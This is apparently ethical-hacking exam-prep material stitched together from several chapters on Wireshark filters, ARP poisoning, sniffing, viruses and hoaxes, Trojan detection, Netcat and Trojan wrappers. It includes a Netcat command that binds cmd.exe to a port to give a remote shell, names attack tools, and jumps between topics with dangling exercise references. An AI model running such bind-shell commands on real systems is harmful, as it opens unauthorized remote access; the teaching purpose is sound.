Wireshark is a freeware sniffer that can capture packets from a wired or wireless LAN connection. It is a very powerful tool which can provide network and upper layer protocol data captured on a network. Like a lot of other network programs, Wireshark uses the pcap network library to capture packets.

Wireshark was called Ethereal until 2006 when the main developer decided to change its name because of copyright reasons with the Ethereal name, which was registered by the company he decided to leave in 2006.

In Exercise 1 you installed and began capturing packets using Wireshark. To narrow down the amount of information gathered by Wireshark, you can use filters. These filters limit the amount of information captured or displayed.

Exercise 1: Create a Wireshark filter to capture only traffic to or from an IP address

Open Wireshark.

Click the active Network Interface to capture traffic.

Click Capture, then select filters.

Click the new button to create a new filter.

Name the new filter in the filter name field.

Type host IPaddress in the filter string field.

Click OK.

Select the capture menu and click start to begin the capture.

Repeat the above steps to create filters using the following strings:

net 192.168.0.0/24 To capture traffic to or from a range of IP addresses.

src net 192.168.0.0/24 To capture traffic from a range of IP addresses.

dst net 192.168.0.0/24 To capture traffic to a range of IP addresses.

port 53 To capture only DNS (port 53) traffic.

hostwww.example.comand not (port 80 or port 25) To capture non-HTTP and non-SMTP traffic on your server.

port not 53 and not arp To capture all except ARP and DNS traffic.

tcp portrange 1501-1549 To capture traffic within a range of ports.

not broadcast and not multicast Capture only unicast traffic. Useful to get rid of noise on the network if you only want to see traffic to and from your machine.

Practice writing filters in Wireshark that capture only one type of protocol traffic or traffic from a specific source IP or MAC address. Use your PC's IP or MAC address to test that the filter is working.

It's important to understand how to create these filters before you attempt the CEH exam.

Because of the way Ethernet switches operate, it is more difficult to gather useful information when sniffing on a switched network. Since most modern networks have been upgraded from hub to switches, it takes a little more effort to sniff on a switched network. One of the ways to do that is to trick the switch into sending the data to the hackers' computer using ARP poisoning.

How ARP Works

ARP allows the network to translate IP addresses into MAC addresses. When one host using TCP/IP on a LAN tries to contact another, it needs the MAC address or hardware address of the host it's trying to reach. It first looks in its ARP cache to see if it already has the MAC address; if it doesn't, it broadcasts an ARP request asking, "Who has the IP address I'm looking for?" If the host that has that IP address hears the ARP query, it responds with its own MAC address, and a conversation can begin using TCP/IP.

ARP poisoning is a technique that's used to attack an Ethernet network and that may let an attacker sniff data frames on a switched LAN or stop the traffic altogether. ARP poisoning utilizes ARP spoofing, where the purpose is to send fake, or spoofed, ARP messages to an Ethernet LAN. These frames contain false MAC addresses that confuse network devices such as network switches. As a result, frames intended for one machine can be mistakenly sent to another (allowing the packets to be sniffed) or to an unreachable host (a denial-of-service, or DoS, attack). ARP spoofing can also be used in a man-in-the-middle attack, in which all traffic is forwarded through a host by means of ARP spoofing and analyzed for passwords and other information.

ARP Spoofing and Poisoning Countermeasures

To prevent ARP spoofing, permanently add the MAC address of the gateway to the ARP cache on a system. You can do this on a Windows system by using the ARP -scommand at the command line and appending the gateway's IP and MAC addresses. Doing so prevents a hacker from overwriting the ARP cache to perform ARP spoofing on the system but can be difficult to manage in a large environment because of the number of systems. In an enterprise environment, port-based security can be enabled on a switch to allow only one MAC address per switch port.

Click the Start button next to the interface that shows packets being sent and received. If you have multiple interfaces with packet activity, choose one of them—preferably the interface with the most activity.

Click on a packet to analyze that single packet. The detailed headers will be displayed beneath the packet capture screen.

Expand each header (IP, TCP) of a packet and identify the address information.

This exercise will provide much more network traffic if performed on a hub rather than a switch. A wireless network can be used, as a wireless LAN is a shared network segment similar to how a hub operates.

Hacking Tools

Wireshark is a freeware sniffer that can capture packets from a wired or wireless LAN connection. The software was previously called Ethereal. Wireshark is a common and popular program because it is free, but it has some drawbacks. An untrained user may find it difficult to write filters in Wireshark to capture only certain types of traffic.

Snort is an intrusion detection system (IDS) that also has sniffer capabilities. It can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, Common Gateway Interface (CGI) attacks, Server Message Block (SMB) probes, and OS fingerprinting attempts.

WinDump is the Windows version of tcpdump, the command-line network analyzer for Unix. WinDump is fully compatible with tcpdump and can be used to watch, diagnose, and save to disk network traffic according to various rules.

EtherPeek is a great sniffer for wired networks with extensive filtering and TCP/IP conversation tracking capabilities. The latest version of EtherPeek has been renamed OmniPeek.

Iris is an advanced data- and network-traffic analyzer that collects, stores, organizes, and reports all data traffic on a network. Unlike other network sniffers, Iris is able to reconstruct network traffic, such as graphics, documents, and emails including attachments.

Sniffer software works by capturing packets not destined for the sniffer system's MAC address but rather for a target's destination MAC address. This is known as promiscuous mode. Normally, a system on the network reads and responds only to traffic sent directly to its MAC address. However, many hacking tools change the system's NIC to promiscuous mode. In promiscuous mode, a NIC reads all traffic and sends it to the sniffer for processing. Promiscuous mode is enabled on a network card with the installation of special driver software. Many of the hacking tools for sniffing include a promiscuous-mode driver to facilitate this process. Not all Windows drivers support promiscuous mode, so when using hacking tools ensure that the driver will support the necessary mode.

Any protocols that don't encrypt data are susceptible to sniffing. Protocols such as HTTP, POP3, Simple Network Management Protocol (SNMP), and FTP are most commonly captured using a sniffer and viewed by a hacker to gather valuable information such as usernames and passwords.

There are two different types of sniffing: passive and active. Passive sniffing involves listening and capturing traffic, and is useful in a network connected by hubs; active sniffinginvolves launching an Address Resolution Protocol (ARP) spoofing or traffic-flooding attack against a switch in order to capture traffic. As the names indicate, active sniffing is detectable but passive sniffing is not detectable.

In networks that use hubs or wireless media to connect systems, all hosts on the network can see all traffic; therefore, a passive packet sniffer can capture traffic going to and from all hosts connected via the hub. A switched network operates differently. The switch looks at the data sent to it and tries to forward packets to their intended recipients based on MAC address. The switch maintains a MAC table of all the systems and the port numbers to which they're connected. This enables the switch to segment the network traffic and send traffic only to the correct destination MAC addresses. A switch network has greatly improved throughput and is more secure than a shared network connected via hubs.

Another way to sniff data through a switch is to use a span port or port mirroring to enable all data sent to a physical switch port to be duplicated to another port. In many cases, span ports are used by network administrators to monitor traffic for legitimate purposes.

All Host-to-Host network communications is based upon the TCP/IP Data Communications Model. The TCP/IP Model is a 4 layer model. The TCP/IP Model maps to the older OSI model with 7 layers of data communication. Most applications use the TCP/IP suite for host-to-host data communications. See Figure 1.

Figure 1: TCP/IP Model

In normal network operations, the application layer data is encapsulated and a header containing address information is added to the beginning of the data. An IP header containing source and destination IP address are added to the data as well as a MAC header containing source and destination MAC addresses. IP addresses are used to route traffic to the appropriate IP network, and the MAC addresses ensure the data is sent to the correct host on the destination IP network. In this manner, traffic is sent from source host to destination host across the Internet and delivery to the correct host is ensured. The postal system works much the same way. Mail is routed to the appropriate area using the zip code, and then the mail is delivered within the zip code to the street and house number. The IP address is similar to the zip code to deliver mail to the regional area, and the street and house numbers are like the MAC address of that exact station on the network.

The address system ensures accurate delivery to the receiver. In normal network operations, a host should not receive data intended for another host as the data packet should only be received by the intended receiver. Simply said, the data should only be received by the station with the correct IP and MAC address. However, we know that sniffers do receive data not intended for them.

Real World Scenario: What Does Mail Delivery Have to Do with Hacking?

In the real world, sometimes mail is not delivered to the intended receiver. I'm sure you have all opened your mailbox to discover an envelope addressed to your neighbor or someone who used to live at your address. This happens on a fairly regular basis at my house. Most people will just leave the mail in the box for the postal carrier to redeliver or physically take the envelope to a neighbor. This same type of situation can occur in computer networking, where application layer data does not reach its intended recipient because of a delivery error or other network fault.

Another cause of mail not being received by the intended recipient is someone is performing reconnaissance and watching your mailbox. Let's assume you are not home and the postal carrier delivers your mail to the mailbox. Someone watching the mailbox from down the street or a nearby building could wait for the mail to be delivered to the mailbox, and they go take the mail or just a particular envelope out of the box. This would be especially effective if the hacker performed some reconnaissance and knew what time each day the mail was delivered. The hacker could then examine and read the information in the envelope, and if they were trying to cover their tracks simply reseal the envelope and put it back in the mailbox.

Sniffing data on a network occurs in much the same way. Data is intercepted, read, and either sent on to the intended recipient or just discarded.

In addition to understanding network addresses, it is also important to understand the format of the TCP Header. Figure 2 shows the TCP Header format.

Figure 2: TCP Header Format

The TCP Header is comprised of the following fields:

Source Port: 16 bits The source port number.

Destination Port: 16 bits The destination port number.

Sequence Number: 32 bits The sequence number of the first data octet in this segment (except when SYN is present). If SYN is present the sequence number is the initial sequence number (ISN) and the first data octet is ISN+1.

Acknowledgment Number: 32 bits If the ACK control bit is set this field contains the value of the next sequence number the sender of the segment is expecting to receive.

Data Offset: 4 bits The number of 32 bit words in the TCP Header. This indicates where the data begins.

Reserved: 6 bits Reserved for future use. Must be zero.

Control Bits: 6 bits

URG: Urgent Pointer field significant

ACK: Acknowledgment field significant

PSH: Push Function

RST: Reset the connection

SYN: Synchronize sequence numbers

FIN: No more data from sender

Window: 16 bits The number of data octets beginning with the one indicated in the acknowledgment field which the sender of this segment is willing to accept.

Checksum: 16 bits The checksum field is a computation of all fields to ensure all data was received and the data was not modified in transit.

Urgent Pointer: 16 bits This field communicates the current value of the urgent pointer as a positive offset from the sequence number in this segment. The urgent pointer points to the sequence number of the octet following the urgent data. This field is only be interpreted in segments with the URG control bit set.

Options: variable Options may occupy space at the end of the TCP header and are a multiple of 8 bits in length.

When referring to the length of the fields in the TCP Header, 8 bits comprises a single byte. A Nibble is less than a byte and a Word is more than a byte.

In the next section we will explore how a hacking tool manipulates normal network operations in order to capture traffic on a host that is not the intended receiver.

A test virus can be created by typing the following code in Notepad and saving the file as EICAR.COM. Your antivirus program should respond when you attempt to open, run, or copy it.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Worms can be prevented from infecting systems in much the same way as viruses. Worms can be more difficult to stop because they spread on their own, meaning they do not need user intervention to install and continue to propagate the malware. Worms can be detected with the use of antimalware software that contains definitions for worms. Worms, most importantly, need to be stopped from spreading. In order to do this, an administrator may need to take systems off line. The best practice for cleaning worms off networked systems is to first remove the computer from the network and then run the security software to clean the worm.

Viruses are classified according to two factors: what they infect and how they infect. A virus can infect the following components of a system:

System sectors

Files

Macros (such as Microsoft Word macros)

Companion files (supporting system files like DLL and INI files)

Disk clusters

Batch files (BAT files)

Source code

A virus infects through interaction with an outside system. Viruses need to be carried by another executable program. By attaching itself to the benign executable a virus can spread fairly quickly as users or the system runs the executable. Viruses are categorized according to their infection technique, as follows:

Polymorphic Viruses These viruses encrypt the code in a different way with each infection and can change to different forms to try to evade detection.

Stealth Viruses These viruses hide the normal virus characteristics, such as modifying the original time and date stamp of the file so as to prevent the virus from being noticed as a new file on the system.

Fast and Slow Infectors These viruses can evade detection by infecting very quickly or very slowly. This can sometimes allow the program to infect a system without detection by an antivirus program.

Sparse Infectors These viruses infect only a few systems or applications.

Tunneling Viruses These viruses are sent via a different protocol or encrypted to prevent detection or allow it to pass through a firewall.

Camouflage Viruses These viruses appear to be another program.

NTFS and Active Directory Viruses These viruses specifically attack the NT file system or Active Directory on Windows systems.

An attacker can write a custom script or virus that won't be detected by antivirus programs. Because virus detection and removal is based on a signature of the program, a hacker just needs to change the signature or look of the virus to prevent detection. The virus signature or definition is the way an antivirus program is able to determine if a system is infected by a virus. Until the virus is detected and antivirus companies have a chance to update virus definitions, the virus goes undetected. Additional time may elapse before a user updates the antivirus program, allowing the system to be vulnerable to an infection. This allows an attacker to evade antivirus detection and removal for a period of time. A critical countermeasure to virus infection is to maintain up-to-date virus definitions in an antivirus program.

One of the most longstanding viruses was the Melissa virus, which spread through Microsoft Word Macros. Melissa infected many users by attaching to the Word doc and then when the file was copied or emailed, the virus spread along with the file.

Virus Hoaxes are emails sent to users usually with a warning about a virus attack. The Virus Hoax emails usually make outlandish claims about the damage that will be caused by a virus and then offer to download a remediation patch from well-known companies such as Microsoft or Norton. Other Hoaxes recommend users delete certain critical systems files in order to remove the virus. Of course, should a user follow these recommendations they will most certainly have negative consequences. Some of the most common virus hoaxes are shown in Table 5.1:

This is a hoax that warned about a supposed virus discovered by Microsoft and McAfee named "Antichrist", telling the user that it is installed via an email with the subject line: "SURPRISE?!!!!!!!!!!" after which it destroys the zeroth sector of the hard disk, rendering it unusable.

Budweiser Frogs

BUDSAVER.EXE

Supposedly would erase the user's hard drive and steal the user's screen name and password.

Goodtimes virus

(none)

Warnings about a computer virus named "Good Times" began being passed around among Internet users in 1994. The Goodtimes virus was supposedly transmitted via an email bearing the subject header "Good Times" or "Goodtimes," hence the virus's name, and the warning recommended deleting any such email unread. The virus described in the warnings did not exist, but the warnings themselves, were, in effect, virus-like.

Invitation attachment (computer virus hoax)

Allright now/I'm just sayin

The invitation virus hoax involved an email spam in 2006 that advised computer users to delete an email, with any type of attachment that stated "invitation" because it was a computer virus.

Jdbgmgr.exe

bear.a

The jdbgmgr.exe virus hoax involved an email spam in 2002 that advised computer users to delete a file named jdbgmgr.exe because it was a computer virus. jdbgmgr.exe, which had a little teddy bear-like icon (The Microsoft Bear), was actually a valid Microsoft Windows file, the Debugger Registrar for Java (also known as Java Debug Manager, hence jdbgmgr).

Life is beautiful

Life is wonderful

The hoax was spread through the Internet around January 2001 in Brazil. It told of a virus attached to an email, which was spread around the Internet. The attached file was supposedly called "Life is beautiful.pps" or "La vita è bella.pps".

Olympic Torch

Postcard or Postcard from Hallmark

Olympic Torch is a computer virus hoax sent out by email. The hoax emails first appeared in February 2006. The "virus" referred to by the email does not actually exist. The hoax email warns recipients of a recent outbreak of "Olympic Torch" viruses, contained in emails titled "Invitation," which erase the hard disk of the user's computer when opened.

SULFNBK.EXE Warning

none

SULFNBK.EXE (short for Setup Utility for Long File Name Backup) is an internal component of the Microsoft Windows operating system (in Windows 98 and Windows Me) for restoring long file names. The component became famous in the early 2000s as the subject of an email hoax. The hoax claimed that SULFNBK.EXE was a virus, and contained instructions to locate and delete the file. While the instructions worked, they were needless and (in some rare cases, for example, when the long file names are damaged and need to be restored) can cause disruptions, as SULFNBK.EXE is not a virus, but instead an operating system component.

To find out whether an email regarding a virus is legitimate, review the list of virus hoaxes on the website home.mcafee.com/virusinfo.

Windows 2003 includes a feature called Windows File Protection (WFP) that prevents the replacement of protected files. WFP checks the file integrity when an attempt is made to overwrite a SYS, DLL, OCX, TTF, or EXE file. This ensures that only Microsoft-verified files are used to replace system files.

Another tool, sigverif, checks to see what files Microsoft has digitally signed on a system. In Exercise 1, we will use this tool.

Exercise 1: Signature Verification

We will run sigverif, a signature verification checker, and compare the results to the currently running processes in Task Manager:

Press Ctrl+Alt+Del and select Start Task Manager.

Click the Processes tab. Note any unusual processes and the amount of CPU time they are using. Any processes using a consistently high percentage of CPU time may indicate a virus or Trojan infection.

Click the Performance tab in Task Manager to view the current CPU usage.

Click Start ð Run.

Type sigverif, and click Start.

In the sigverif program, choose Advanced to see the signature verification report.

Click the View Log button to see the report.

System File Checker is another command line–based tool used to check whether a Trojan program has replaced files. If System File Checker detects that a file has been overwritten, it retrieves a known good file from the Windows\system32\dllcache folder and overwrites the unverified file. The command to run the System File Checker issfc/scannow.

Most commercial antivirus program have anti-Trojan capabilities as well as spyware detection and removal functionality. These tools can automatically scan hard drives on startup to detect backdoor and Trojan programs before they can cause damage. Once a system is infected, it's more difficult to clean, but you can do so with commercially available tools.

The security software works by having known signatures of malware, such as Trojans and viruses. The repair for the malware is made through the use of definitions of the malware. When installing and using any personal security software or antivirus and anti-Trojan software, you must make sure that the software has all the current definitions. To ensure the latest patches and fixes are available, you should connect the system to the Internet so the software can continually update the malware definitions and fixes.

It's important to use commercial applications to clean a system instead of freeware tools, because many freeware removal tools can further infect the system. In addition, a lot of commercial security software includes an intrusion detection component that will perform port monitoring and can identify ports that have been opened or files that have changed.

The key to preventing Trojans and backdoors from being installed on a system is to educate users not to install applications downloaded from the Internet or open email attachments from parties they don't know. Many system administrators don't give users the system permissions necessary to install programs on their system for that very reason. Proper use of Internet technologies should be included in regular employee security awareness training.

Port-Monitoring and Trojan-Detection Tools

Fport reports all open TCP/IP and UDP ports and maps them to the owning application. You can use fport to quickly identify unknown open ports and their associated applications.

TCPView is a Windows program that shows detailed listings of all TCP and UDP endpoints on the system, including the local and remote addresses and state of TCP connections. When TCPView runs, it enumerates all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions.

PrcView is a process viewer utility that displays detailed information about processes running under Windows. PrcView comes with a command-line version you can use to write scripts that check whether a process is running and, if so, kill it.

Inzider is a useful tool that lists processes in the Windows system and the ports on which each one listens. Inzider may pick up some Trojans. For instance, BackOrifice injects itself into other processes, so it isn't visible in the Task Manager as a separate process, but it does have an open port that it listens on.

Tripwire verifies system integrity. It automatically calculates cryptographic hashes of all key system files or any file that is to be monitored for modifications. The Tripwire software works by creating a baseline snapshot of the system. It periodically scans those files, recalculates the information, and sees whether any of the information has changed. If there is a change, the software raises an alarm.

Dsniff is a collection of tools used for network auditing and penetration testing. Dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and WebSpy passively monitor a network for interesting data such as passwords, email, and file transfers. Arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker due to Layer 2 switching. Sshmitm and webmitm implement active man-in-the-middle attacks against redirected Secure Shell (SSH) and HTTP Over SSL (HTTPS) sessions by exploiting weak bindings in ad hoc Public Key Infrastructure (PKI).

Netcat is a Trojan that uses a command-line interface to open TCP or UDP ports on a target system. A hacker can then telnet to those open ports and gain shell access to the target system. Exercise 1 shows you how to use Netcat.

Note

For the CEH exam, it's important to know how to use Netcat. Make sure you download the Netcat tool and practice the commands before attempting the exam.

Exercise 1: Using Netcat

Download a version of Netcat for your system. There are many versions of Netcat for all Windows OSs. Also, Netcat was originally developed for the Unix system and is available in many Linux distributions, including BackTrack.

Netcat needs to run on both a client and the server. The server side of the connection in enabled by the -l attribute and is used to create a listener port. For example, use the following command to enable the Netcat listener on the server:

nc -L -p 123 -t -e cmd.exe

On the Netcat client, run the following command to connect to the Netcat listener on the server:

nc <ip address of the server> <listening port on the server>

The client should then have a command prompt shell open from the server.

Unusual system behavior is usually an indication of a Trojan attack. Actions such as programs starting and running without the user's initiation; CD-ROM drawers opening or closing; wallpaper, background, or screen saver settings changing by themselves; the screen display flipping upside down; and a browser program opening strange or unexpected websites are all indications of a Trojan attack. Any action that is suspicious or not initiated by the user can be an indication of a Trojan attack.

Real World Scenario: Indications of a Virus or Trojan Infection

Carrie was using her computer at work and noticed that her computer seemed to be running slowly. When she tried to open files in Microsoft Word, her system would give an error message and then she was unable to use certain functions in the program. She had not received any new email messages in the last 24 hours; she usually received 50 or so messages per day, so this seemed a bit unusual. Lastly, a client of hers had said he received duplicate emails from her last week, which seemed odd.

So, Carrie called John, the company network administrator, and asked him to look at her computer to determine what was causing the computer slowdown and other issues with Microsoft Outlook. John looked at Carrie's computer and noticed that the virus definitions were 6 months old. The antivirus program kept popping up with windows indicating that the virus definitions were out of date, but Carrie just ignored them and kept closing the pop-up windows. John updated the antivirus definitions and ran a full system scan. The antivirus program determined that the system had been infected with 114 viruses and Trojans. The antivirus program was able to clean the infections and restore the computer to its previous uninfected state. John was testing Microsoft Outlook to ensure that it was indeed working when he noticed several emails from online horoscope services, entertainment websites, and online gaming websites. John removed several questionable programs from her computer. Apparently, Carrie did not realize that these types of downloads could cause harm to her computer.

Network software to push virus updates to all workstations, network controls to prevent installation of unauthorized software, and user security awareness training could have prevented this incident from occurring.

Wrappers are software packages that can be used to deliver a Trojan. The wrapper binds a legitimate file to the Trojan file. Both the legitimate software and the Trojan are combined into a single executable file and installed when the program is run.

Generally, games or other animated installations are used as wrappers because they entertain the user while the Trojan in being installed. This way, the user doesn't notice the slower processing that occurs while the Trojan is being installed on the system—the user only sees the legitimate application being installed.

Hacking Tools

Graffiti is an animated game that can be wrapped with a Trojan. It entertains the user with an animated game while the Trojan is being installed in the background.

Silk Rope 2000 is a wrapper that combines the BackOrifice server and any other specified application.

ELiTeWrap is an advanced EXE wrapper for Windows used for installing and running programs. ELiTeWrap can create a setup program to extract files to a directory and execute programs or batch files that display help menus or copy files on to the target system.

Icon Converter Plus is a conversion program that translates icons between various formats. An attacker can use this type of application to disguise malicious code or a Trojan so that users are tricked into executing it, thinking it is a legitimate application.